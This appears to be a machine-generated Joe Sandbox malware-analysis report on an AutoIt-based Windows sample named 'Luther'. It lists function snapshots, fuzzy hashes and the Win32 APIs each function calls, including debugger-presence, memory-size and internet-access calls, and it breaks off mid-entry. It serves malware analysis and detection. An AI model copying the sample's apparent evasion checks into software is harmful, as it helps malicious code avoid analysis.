                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #
                                                                                                          • API String ID: 0-1885708031
                                                                                                          • Opcode ID: e173f40ba0b54b447f3f662b99da9cb2383ca69090826246843101db7802abc5
                                                                                                          • Instruction ID: 4d6315d060f93b99e905122a2fb18860924cea2dd1e6c367b228f288b864b72d
                                                                                                          • Opcode Fuzzy Hash: e173f40ba0b54b447f3f662b99da9cb2383ca69090826246843101db7802abc5
                                                                                                          • Instruction Fuzzy Hash: 58516832504246DFCB25EF28E441AFA7BA0EF55324FA85069FDA9BB2D0DB309D42C751
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00E4F6DB
                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E4F6F4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                          • Opcode ID: dc5543f9632446957bce8b357242b73d1f50389b98a5566b45229b5d1b40389d
                                                                                                          • Instruction ID: 219fb51202367e3e140040ec36d497750029f0c52091834d83e75faa4931398f
                                                                                                          • Opcode Fuzzy Hash: dc5543f9632446957bce8b357242b73d1f50389b98a5566b45229b5d1b40389d
                                                                                                          • Instruction Fuzzy Hash: 805148B14087489FD320AF11DC8ABABBBECFB84300F81485DF1D9611A1DB718529CB66
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00EADB75
                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EADB7F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                          • String ID: |
                                                                                                          • API String ID: 596671847-2343686810
                                                                                                          • Opcode ID: b4dcfa2f23a41024417ea65005429e85724b906fa9e4056dfda6955ac91048cd
                                                                                                          • Instruction ID: 3bfa1544d745563a58bf890a67a45537745caeb4c83d2ed0ec58478e81aae5e9
                                                                                                          • Opcode Fuzzy Hash: b4dcfa2f23a41024417ea65005429e85724b906fa9e4056dfda6955ac91048cd
                                                                                                          • Instruction Fuzzy Hash: 04315071801209ABCF05DFA4CD499EEBFB9FF09314F501029F915B6162EB719A06CB50
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00EC40BD
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EC40F8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$DestroyMove
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                          • Opcode ID: e5262e569e659119e8d142af9a4f0d4f8d4e5fafee22eb20eda2ba1b234cbb58
                                                                                                          • Instruction ID: 978385bff65458d250af52f7fbf05850caa9e664a084dc02eda8b92cb010112a
                                                                                                          • Opcode Fuzzy Hash: e5262e569e659119e8d142af9a4f0d4f8d4e5fafee22eb20eda2ba1b234cbb58
                                                                                                          • Instruction Fuzzy Hash: AC31B2B1100604AEDB14DF24CC51FFB77A9FF48724F00961DF995A7190CA32AC82C761
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EC50BD
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC50D2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: '
                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                          • Opcode ID: ccaf5661bf4f35bf87e95b858aaf4c9185415458948fa086314cf19efff82398
                                                                                                          • Instruction ID: fce6dac68cda70c2cdcfdadf6627582b0e02e7813ec41c03f4d6748babcfe9e5
                                                                                                          • Opcode Fuzzy Hash: ccaf5661bf4f35bf87e95b858aaf4c9185415458948fa086314cf19efff82398
                                                                                                          • Instruction Fuzzy Hash: 82313775A0060A9FDB04CF65C981FDA7BB5FF09304F20506AE904EB391D772A986CF90
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E37873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E378B1
                                                                                                            • Part of subcall function 00E37873: GetStockObject.GDI32(00000011), ref: 00E378C5
                                                                                                            • Part of subcall function 00E37873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E378CF
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00EC4216
                                                                                                          • GetSysColor.USER32(00000012), ref: 00EC4230
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                          • String ID: static
                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                          • Opcode ID: dc0aa4cc04042989aff45303b38a94e86837de02faf3a3f039d561dbd7917eb6
                                                                                                          • Instruction ID: 0eb3477fdb6310b7b18f7f5c4e3427fb2b93643c28d0d0e018294d9de437ba09
                                                                                                          • Opcode Fuzzy Hash: dc0aa4cc04042989aff45303b38a94e86837de02faf3a3f039d561dbd7917eb6
                                                                                                          • Instruction Fuzzy Hash: D01126B2610209AFDB05DFA8CD46EEA7BE8EB08318F015528FD55E3250D636E852DB60
                                                                                                          APIs
                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EAD7C2
                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EAD7EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$OpenOption
                                                                                                          • String ID: <local>
                                                                                                          • API String ID: 942729171-4266983199
                                                                                                          • Opcode ID: 7727d95d5bb7d19b724290dc22b9c95a5aeed0368da3194ef2ee18bd9efdc535
                                                                                                          • Instruction ID: 7bf648120c5e3ce55ffe45e2925368b17c2fec72753454cb557f916fddcf5ea2
                                                                                                          • Opcode Fuzzy Hash: 7727d95d5bb7d19b724290dc22b9c95a5aeed0368da3194ef2ee18bd9efdc535
                                                                                                          • Instruction Fuzzy Hash: 5A11067110923279D73C4B668C49EF7BE9CEB177A8F00522BB50AA6480D670A840C6F0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00E9761D
                                                                                                          • _wcslen.LIBCMT ref: 00E97629
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                          • String ID: STOP
                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                          • Opcode ID: 332425a98c20526ac4c476e21357ef54d9e9d4b2347178364d96dbd89368bdbf
                                                                                                          • Instruction ID: 473b534e24964e73abaafac8a8d8684c9907d67f23b894540363f3d6e2e7fef5
                                                                                                          • Opcode Fuzzy Hash: 332425a98c20526ac4c476e21357ef54d9e9d4b2347178364d96dbd89368bdbf
                                                                                                          • Instruction Fuzzy Hash: A201C432628A268BCF10AEBDCC459BF77B5AB60758B501524E8A2B6192EB31D908C650
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620
                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E92699
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 624084870-1403004172
                                                                                                          • Opcode ID: 4a724c28e8be00dd83e8d06a658d0057629ef728f7d6db52ba889cb567658834
                                                                                                          • Instruction ID: 54061b71fdf46be35db40fffd16e4e8e1ba4b0ac05d3de1bf8630ea8e8ecc833
                                                                                                          • Opcode Fuzzy Hash: 4a724c28e8be00dd83e8d06a658d0057629ef728f7d6db52ba889cb567658834
                                                                                                          • Instruction Fuzzy Hash: 3501B175600228BBCF04ABA4CC55DFE77A8EF86350F40262EAA33B72C2DA715809C650
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620
                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E92593
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 624084870-1403004172
                                                                                                          • Opcode ID: db6d93d385d84f84df4475db97c35c994ec63497082a5c157a30d836e9cf11f0
                                                                                                          • Instruction ID: 5cef02059d6683e2a57815ae4fe809552856e25fa05ab2e3ac834e3ccbce9f7d
                                                                                                          • Opcode Fuzzy Hash: db6d93d385d84f84df4475db97c35c994ec63497082a5c157a30d836e9cf11f0
                                                                                                          • Instruction Fuzzy Hash: DE01A7756401087BCF05E7A0C966EFE77E8DF45344F5020297A03B72C1DA619E09C6B2
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620
                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E92615
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 624084870-1403004172
                                                                                                          • Opcode ID: 336de049beb58e10db0ce40b9428f43611c54b9f91323c000f74a4a14448df1a
                                                                                                          • Instruction ID: 66197362a34ea95422785c99a7c6c1feaeff2cf4fbd5559dbd57af90fe4e22a6
                                                                                                          • Opcode Fuzzy Hash: 336de049beb58e10db0ce40b9428f43611c54b9f91323c000f74a4a14448df1a
                                                                                                          • Instruction Fuzzy Hash: EF01A2B6A401087BCF15E7A0C905EFE77E89B05344F50202ABA03F7282DA619E09D6B1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620
                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E92720
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 624084870-1403004172
                                                                                                          • Opcode ID: 73ed5088c2dc1c42ca816c35de0e854ed46accaeb1d262595d91afbf828216c3
                                                                                                          • Instruction ID: 8de6884957d0c04d2acdf01014d450fc8e790f841113fd472cc9367459931308
                                                                                                          • Opcode Fuzzy Hash: 73ed5088c2dc1c42ca816c35de0e854ed46accaeb1d262595d91afbf828216c3
                                                                                                          • Instruction Fuzzy Hash: 63F0A475A402187BCF15B7A4CC55FFE77A8AF05754F40292AB623B72C2DBB1580DC660
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 2<$j3
                                                                                                          • API String ID: 0-463933582
                                                                                                          • Opcode ID: 27feb05ed8b8906ebd8b5e95a8a98e80ecfd5294d9550c34c8ffddcac8427dec
                                                                                                          • Instruction ID: f0c7f2d572c7329e29097658e6851d357f9f2ee945137d3c5343ec16147eb1a0
                                                                                                          • Opcode Fuzzy Hash: 27feb05ed8b8906ebd8b5e95a8a98e80ecfd5294d9550c34c8ffddcac8427dec
                                                                                                          • Instruction Fuzzy Hash: 5EF0F028104148AADB108FE1DC40AF977B8DF04780F00406ABCCAE7280FA758F81E365
                                                                                                          APIs
                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E9146F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message
                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                          • Opcode ID: 4b34c5ee94a6a9c9453480195f0c81068e6398c25e851cd31fde9b36a52f68e4
                                                                                                          • Instruction ID: 6153acfdf7694d4decca037566601119638578a7bffe0d11885d93773b309a11
                                                                                                          • Opcode Fuzzy Hash: 4b34c5ee94a6a9c9453480195f0c81068e6398c25e851cd31fde9b36a52f68e4
                                                                                                          • Instruction Fuzzy Hash: E4E0D832249B283BD2102794AD03FC57AC48F04B56F11583EFB88754C24EE324508299
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E4FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E510E2,?,?,?,00E3100A), ref: 00E4FAD9
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00E3100A), ref: 00E510E6
                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E3100A), ref: 00E510F5
                                                                                                          Strings
                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E510F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                          • API String ID: 55579361-631824599
                                                                                                          • Opcode ID: 5a3b847711710c40babac1e6443fa9978e2104e62709db050edd0b901394a8f6
                                                                                                          • Instruction ID: 27d1158c37b1b3114247b7b710c684482ee372e0d572b23551d95e7271557eef
                                                                                                          • Opcode Fuzzy Hash: 5a3b847711710c40babac1e6443fa9978e2104e62709db050edd0b901394a8f6
                                                                                                          • Instruction Fuzzy Hash: 65E06D706007508FD3249F25EA09742BBE4EB00705F049DADEC85E2291DBB5E449CBA1
                                                                                                          APIs
                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00EA39F0
                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00EA3A05
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Temp$FileNamePath
                                                                                                          • String ID: aut
                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                          • Opcode ID: 7877ff6d01301fe498b76ce94b3c70fd7fa9b6e96e111da36d263a36770be824
                                                                                                          • Instruction ID: 0eba368c2cf140501467b42cc0e9bc9ae7c41e804a3767e379dc7ab64811e76b
                                                                                                          • Opcode Fuzzy Hash: 7877ff6d01301fe498b76ce94b3c70fd7fa9b6e96e111da36d263a36770be824
                                                                                                          • Instruction Fuzzy Hash: 21D05B71504318ABDA2097559C0DFDB7A6CDB44710F0001B1BE95A10A1DAB1D549C790
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC2E08
                                                                                                          • PostMessageW.USER32(00000000), ref: 00EC2E0F
                                                                                                            • Part of subcall function 00E9F292: Sleep.KERNEL32 ref: 00E9F30A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
